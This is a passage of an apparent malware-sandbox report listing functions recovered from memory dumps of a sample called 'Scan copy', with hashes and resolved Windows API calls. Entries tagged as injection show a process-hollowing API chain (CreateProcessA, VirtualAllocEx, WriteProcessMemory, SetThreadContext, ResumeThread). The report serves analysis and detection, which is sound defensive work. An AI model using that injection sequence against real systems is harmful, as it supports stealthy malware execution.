Opcode Fuzzy Hash: 58b53b7c0abd3b92e734f3a35b9ed7b4569f011dce57f4e5697dbf4320ab0d49
Instruction Fuzzy Hash: 85818174E002189FEB14DFA9C850AEEBBB2FF88310F148069E519BB365DB356946DF50

Function 00B4705B Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36861bfe2ffbbad573c0268888a6607feee88d26942b24704c09c56b0bb7a5d6
Instruction ID: 21b548ad1f17d2462addce3cd2d7bb5a4149f8f3d1c68d0f92639cf58db62dfc
Opcode Fuzzy Hash: 36861bfe2ffbbad573c0268888a6607feee88d26942b24704c09c56b0bb7a5d6
Instruction Fuzzy Hash: 30819174E002189FEB14DFA9C850AEEBBB2FF88310F148069E519BB365DA356946DF50

Function 06C8D290 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff8fffd23a445b5cfc805733ddae7aa3458a523ff3fb3e8d9f187cc10eac607
Instruction ID: 8795b680e7c5465428acaf9d64f5b148191189cd358cee5c9723689df584212e
Opcode Fuzzy Hash: eff8fffd23a445b5cfc805733ddae7aa3458a523ff3fb3e8d9f187cc10eac607
Instruction Fuzzy Hash: E5E0BF34D5A114DFD7A0EF95E5515F8B7F8AF4A215F013066940EA3251DA306941CB80

Function 06C89C40 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C89E76

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8c50b32ec65e0a984191150b05edea2e8d299c0e0bbb50a2488822d8f69272f3
Instruction ID: 689b3919a9587971c288d20e129873a6c7fd444b788c6a47374ff046e3619e84
Opcode Fuzzy Hash: 8c50b32ec65e0a984191150b05edea2e8d299c0e0bbb50a2488822d8f69272f3
Instruction Fuzzy Hash: 5C915C71D003599FDF64DF68C841BEEBBB2BF44314F0485AAE809A7240DB759A85CF91

Function 06C89C3D Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C89E76

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d133d6cc1f110610a344d1a022759c6fc13774cc099c75152730bdb77bb58fd9
Instruction ID: 8134db9030f5ecea6e0b97e203b7511708ea831905846c6effa71d86a22ca707
Opcode Fuzzy Hash: d133d6cc1f110610a344d1a022759c6fc13774cc099c75152730bdb77bb58fd9
Instruction Fuzzy Hash: 6B915C71D003599FDF64DF68C8417EEBBB2BF44314F0485AAE809A7240DB759A85CF91

Function 00B44544 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B45E89

Memory Dump Source

Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a6fa6660b1301032ce5f9e951a56be63f8cc7c33c1fae05a365c1d3c7d2af4e8
Instruction ID: 3c15a218e560f8e6bd085a841f81de503fed45101893f890dad26c86d994687f
Opcode Fuzzy Hash: a6fa6660b1301032ce5f9e951a56be63f8cc7c33c1fae05a365c1d3c7d2af4e8
Instruction Fuzzy Hash: 8741D571C00B1DCBDB24DFA9C84478DBBF5BF48304F208169D409AB255DB756A4ACF90

Function 00B45DD7 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B45E89

Memory Dump Source

Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e27253ff421120e94379f989dd95662ba390d4114a6fa5272ded046444086fc3
Instruction ID: 11cc8298fbf8070cdf12da5f31460e26304c1d4878afc35b0708b2b8c0237795
Opcode Fuzzy Hash: e27253ff421120e94379f989dd95662ba390d4114a6fa5272ded046444086fc3
Instruction Fuzzy Hash: 1041E371C00B19CFDB24DFA9C84478DBBF5BF48304F20816AD418AB255DB756A4ACF50

Function 05957668 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 7cd4605709f029a91cb74fe2a4e9ab30db4c3e5ffbb78c492270acbe857bfb8d
Instruction ID: 716648ac97693be68bdd9c818d1ceaf66b3cf1b055e9c1f50e671498852c3ab3
Opcode Fuzzy Hash: 7cd4605709f029a91cb74fe2a4e9ab30db4c3e5ffbb78c492270acbe857bfb8d
Instruction Fuzzy Hash: 1D31BC719043599FCB11DFA9D844ADEBFF8EF49320F04805AE954EB261C3359964CFA1

Function 05956810 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 059568AF

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: e7602ccc1bd973855e37a071123ffae0a84559fcd2b897c25727c9e13a6a17e8
Instruction ID: 57dcafee721692d1592250c24a98beb826c9eaacf9d2ec09f6324f5921217883
Opcode Fuzzy Hash: e7602ccc1bd973855e37a071123ffae0a84559fcd2b897c25727c9e13a6a17e8
Instruction Fuzzy Hash: 4A31FDB5D003099FDB10CF9AD884A9EBBF9BB48220F54842AE919A7310D775A914CFA0

Function 06C899B3 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C89A48

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 113060121f428f1c7e7ffacc2a2cf79ce834f918760d0eca75ce081d0d9598dd
Instruction ID: 015dee4daee814bc4622d6b3d582fe448818e1583f47172cb625caa5d348a239
Opcode Fuzzy Hash: 113060121f428f1c7e7ffacc2a2cf79ce834f918760d0eca75ce081d0d9598dd
Instruction Fuzzy Hash: 4A2164B5D003599FDB10DFA9C981BEEBBF5FF48314F10842AE919A7240C7789945CBA4

Function 06C899B8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C89A48

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ce0299fefcb24e47eea896b4a87b7f3c96599167ea29ed57336327c6889dd251
Instruction ID: 5cd8a737cdab5375c99118eb1543e5dc3c894407b522994f2d47ea77b2cbd48a
Opcode Fuzzy Hash: ce0299fefcb24e47eea896b4a87b7f3c96599167ea29ed57336327c6889dd251
Instruction Fuzzy Hash: 51213675D003499FDB10DFAAC881BEEBBF5FF48314F50842AE919A7240C7799945CBA4

Function 05956818 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 059568AF

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 33dd739821bc9a0e0b9feb90a81fb2c218f12a23327794cde029a44dca33c70a
Instruction ID: e9ff558bcef94414d3a02cf3bf867ceac76a2d81bcfa056939337800d2f0da9d
Opcode Fuzzy Hash: 33dd739821bc9a0e0b9feb90a81fb2c218f12a23327794cde029a44dca33c70a
Instruction Fuzzy Hash: 2F21CCB5D003499FDB10CF9AD884A9EFBF9FB48320F54842AE919A7310D775A954CFA0

Function 00B4D308 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B4D76E,?,?,?,?,?), ref: 00B4D82F

Memory Dump Source

Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a74563e83db6b39e3721262ff4e201954ddfde6d1fb7a5d59ba4ac2739b0bd21
Instruction ID: a17cf39b304bc9ff9c85c08a51fcf41c157e32f22885704ae72ccfc9b6103a95
Opcode Fuzzy Hash: a74563e83db6b39e3721262ff4e201954ddfde6d1fb7a5d59ba4ac2739b0bd21
Instruction Fuzzy Hash: 8821E5B5D002499FDB10CF9AD984AEEBBF5FB48310F14805AE914A7350D379A944DFA4

Function 06C893E3 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C89466

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a3070819a9f74af507aeaf5ff49026fdc73e645f318e2f043beded85b23ecc6c
Instruction ID: 3414a093c502ed6491b560996e4d533483674973bc34ff9bc87b8f4d62701342
Opcode Fuzzy Hash: a3070819a9f74af507aeaf5ff49026fdc73e645f318e2f043beded85b23ecc6c
Instruction Fuzzy Hash: 3D2168B1D003098FDB20DFA9C8817EEBBF4AF88314F54842AD459A7340DB789A45CFA4

Function 06C89AA0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06C89B28

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b54b28a8567edbe1d5afdd26a7cbb18450eedb9daf531188302e2e8336dca137
Instruction ID: bcfb09938633865afe078b180fceab7e7519c431c67dba44205ca9a2ca783ecd
Opcode Fuzzy Hash: b54b28a8567edbe1d5afdd26a7cbb18450eedb9daf531188302e2e8336dca137
Instruction Fuzzy Hash: 832125B1D003599FDB10DFA9C881BEEBBF1FF48310F50842AE919A7240C7389901CBA0

Function 06C893E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C89466

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f82eb8b541cd231df17df7b0436f028f4e3b4d715d60a2ce216506f65cf6cb40
Instruction ID: 204a89042ca5f213c5fa8d69cda56b8db68464f3dbb52039c643caa4585d9f9b
Opcode Fuzzy Hash: f82eb8b541cd231df17df7b0436f028f4e3b4d715d60a2ce216506f65cf6cb40
Instruction Fuzzy Hash: 8A210771D003098FDB20DFAAC885BAEBBF4AB88214F548429D559A7240DB789945CFA5

Function 06C89AA8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06C89B28

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 93d87e32f10e9dcc0cb11cd2093447d6a50094dc805544c34161f43588dc7291
Instruction ID: 4f52b4f1bce764fa82c257f7194902ab9879baa5aa245f1f5222ca75af897fa8
Opcode Fuzzy Hash: 93d87e32f10e9dcc0cb11cd2093447d6a50094dc805544c34161f43588dc7291
Instruction Fuzzy Hash: 0221E671C003499FDB20DFAAC841BEEBBF5FF48310F50842AE919A7240D7799945DBA5

Function 0595420C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05957682,?,?,?,?,?), ref: 05957727

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 3a4c7b29680fd8f1a3ba8f98f3f6a5b86d01701f9bef62826e031e061e8fa532
Instruction ID: 52625ae35b6bcc94bcc0c4dcd3d2aa4add5b90d1ba037c4f0c410e834d93d193
Opcode Fuzzy Hash: 3a4c7b29680fd8f1a3ba8f98f3f6a5b86d01701f9bef62826e031e061e8fa532
Instruction Fuzzy Hash: F1116AB580034D9FDB10CFAAD844BDEBFF8EB48320F14841AE955A7250C335A954CFA4

Function 06C898F3 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06C89966

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3b137704f2ecc8f958913bb8e24dc347e3ca79e5c036878b4e9e78ddaf80238c
Instruction ID: c22448fe6558e1a3dbdf885e22961a0e059153ea572f0033530a0ec7ddc26a62
Opcode Fuzzy Hash: 3b137704f2ecc8f958913bb8e24dc347e3ca79e5c036878b4e9e78ddaf80238c
Instruction Fuzzy Hash: 28115671C003498FDB20DFAAC844BEFBBF5AB48320F248819E519A7250CB369944CFA0

Function 06C898F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06C89966

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 35ad6934011c4bd65dcf0e372451f92dfea1cc3bd6201d8c78f440ba2589b224
Instruction ID: 21743a60048c706951ae378d98c5b8913156ba29234ac57bc199bdd9ea79a763
Opcode Fuzzy Hash: 35ad6934011c4bd65dcf0e372451f92dfea1cc3bd6201d8c78f440ba2589b224
Instruction Fuzzy Hash: D8112375C003499FDB20DFAAC845BEEBBF5EB48324F148419E919A7250CB76A940CFA4

Function 06C89333 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06C8939A

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3cc6f48bb63eb04c15937196fce4db543aadbc50f8b021b9c222632e31b4a69e
Instruction ID: 376483cca128ca4329735880160bce9ce7698114004d5755fce8640264ba8574
Opcode Fuzzy Hash: 3cc6f48bb63eb04c15937196fce4db543aadbc50f8b021b9c222632e31b4a69e
Instruction Fuzzy Hash: 6D1158B5C003498FDB20DFA9C8457EEBBF5AB48224F24881AC419A7240CA356941CBA4

Function 06C89338 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06C8939A

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1b3a55f1a8c2f87d98b1b40c5eb19dd45cbe9ed603f79373f69c32cb425f72d0
Instruction ID: c2357ca0b23b7baa3c46a8707dafa24b9a9718c215cf62f2594d79f8c513e1a6
Opcode Fuzzy Hash: 1b3a55f1a8c2f87d98b1b40c5eb19dd45cbe9ed603f79373f69c32cb425f72d0
Instruction Fuzzy Hash: 50113A71D003498FDB20DFAAC8457AEFBF5EB48324F148419D519A7240CB756945CFA4

Function 06C86550 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C8DFED

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 42ea2dc9ffdaaac34f1cce13917c2008f0927554d8f37ad54fd9dcc7fbab34e9
Instruction ID: 2fcd638a5e7de1554aca8d8c6f78c733ff6168931fc97d227860b3b9cf30204e
Opcode Fuzzy Hash: 42ea2dc9ffdaaac34f1cce13917c2008f0927554d8f37ad54fd9dcc7fbab34e9
Instruction Fuzzy Hash: 201103B5C00349DFDB20DF9AC845BDEBBF8EB48324F108459E519A7240C375A944CFA5

Function 06C8DF88 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C8DFED

Memory Dump Source

Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 373fc660a6553e4819da3d513e5da0baa8f462c8e14b4f7cbc20f3906d7c3191
Instruction ID: 966a5e7152cbe2ec6d4faf65a6039297a581ff5fd11caede9cf138d96e996c94
Opcode Fuzzy Hash: 373fc660a6553e4819da3d513e5da0baa8f462c8e14b4f7cbc20f3906d7c3191
Instruction Fuzzy Hash: 711103B58003499FDB20DF9AC985BDEBBF8EB48324F10841AE559A7240C375A944CFA0

Function 00B4B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00B4B51E

Memory Dump Source

Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 49836323d4ca92423855e56d13ea69a6316e52c4d310cc2980aa6ad66f64d1d0
Instruction ID: 4c273e1b3b0e423b7127800a04a42b5892fdb445cc1bc3543e9b92d8c1efe972
Opcode Fuzzy Hash: 49836323d4ca92423855e56d13ea69a6316e52c4d310cc2980aa6ad66f64d1d0
Instruction Fuzzy Hash: 9A1113B6C003498FCB10CF9AD444BDEFBF4EB48314F14845AD519A7200D375A645CFA1

Function 009ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee4426b201cca2e2621e6fa3e79c6f151ae937c8b55962fcede04957a88a04e
Instruction ID: 3c0dd4edebd1420349bdef33789613bf1367be0eacb11c225a952ed3fda48527
Opcode Fuzzy Hash: 9ee4426b201cca2e2621e6fa3e79c6f151ae937c8b55962fcede04957a88a04e
Instruction Fuzzy Hash: F2214871504284DFDB16DF00D9C0B16BB65FBA8324F20C569E8090F2E6D33AEC46CBA2

Function 009ED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da73d2728f8c91a9d551ab811653fb4e25df283f34817d59628fe20a21617d7
Instruction ID: a548eda0975b086f21aa1f7139e67bdac840511faba34606c2a2cc9ab13f97d3
Opcode Fuzzy Hash: 8da73d2728f8c91a9d551ab811653fb4e25df283f34817d59628fe20a21617d7
Instruction Fuzzy Hash: 9F212871505280DFDB16DF14D9C0B26BF65FB94318F20C569E8050B25AC736DC56CBA2

Function 00AFD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efbcdc151a4184e55c05f446d52c87daea2fe0c623fe1f426cfd9924605cd12a
Instruction ID: 02f502be08c50c1c5110593fb67378e43f2ce527f84b1dca4293d3987858c59f
Opcode Fuzzy Hash: efbcdc151a4184e55c05f446d52c87daea2fe0c623fe1f426cfd9924605cd12a
Instruction Fuzzy Hash: CA212271604308EFDB16DF50D9C4B26BB62FB84314F20C56DEA4A4B386CB36D807CA62

Function 00AFD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b405ddb436fd84a394e1e3992738dc4596c9d54c799fc43a737e3a96f45312
Instruction ID: d836b9b9669cf22ff5c6ca26677979e8619c20031e3cda19cc00295c130036d5
Opcode Fuzzy Hash: 63b405ddb436fd84a394e1e3992738dc4596c9d54c799fc43a737e3a96f45312
Instruction Fuzzy Hash: DF210771604308EFDB16DF90D9C4B66BB66FB84314F20C66DEA494F296C336D846CAA1

Function 00AFD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ace1e83d5569f2751291730a1694cebd92936df93ca32e4fa961cddec862114
Instruction ID: 1d8d221de877cddf62edd429c270a08d2364d47bc628ff9fec158a29c886b1c3
Opcode Fuzzy Hash: 7ace1e83d5569f2751291730a1694cebd92936df93ca32e4fa961cddec862114
Instruction Fuzzy Hash: 792180755093848FCB07CF24D990715BF72EB46314F28C5EAD9498B6A7C33A980ACB62

Function 009ED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: d5ecf86e06f42882f90a8fc2da1c34d10ccf49fe296376cdd62652b1b335b293
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 6F112676504280DFCB06CF00D5C0B16BF72FBA4324F24C2A9D8090B2A6C33AE856CBA1

Function 009ED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 86eeba9c9141aa01cb3abd1806a0ab3c57f3fc67862eb744480dadc04806a654
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 4D11E676504280DFCB16CF14D9C4B16BF72FB94324F24C6ADE8490B65AC336D856CBA1

Function 00AFD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: 015d8247f8282a1a93ff70f20ab1091aa90e60086e229032a31c6be38af107fb
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 2611DD75504284DFCB06CF50C5C0B65FBB2FB84324F24C6AEE9494B296C33AD80ACBA1

Function 009ED731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844dcc659a4072d0c8e290e1e11de4335bd8f59c2e37621b4042de5c2f0fea97
Instruction ID: 392972ced6151ba391c5ede770a994d190b9b34c0729bf40e9894eaabbfc5926
Opcode Fuzzy Hash: 844dcc659a4072d0c8e290e1e11de4335bd8f59c2e37621b4042de5c2f0fea97
Instruction Fuzzy Hash: A301F7B14093849BE7214B22CCC4766BB9CDF41325F14C819EC084F282C27A9C40CAB2

Function 009ED730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

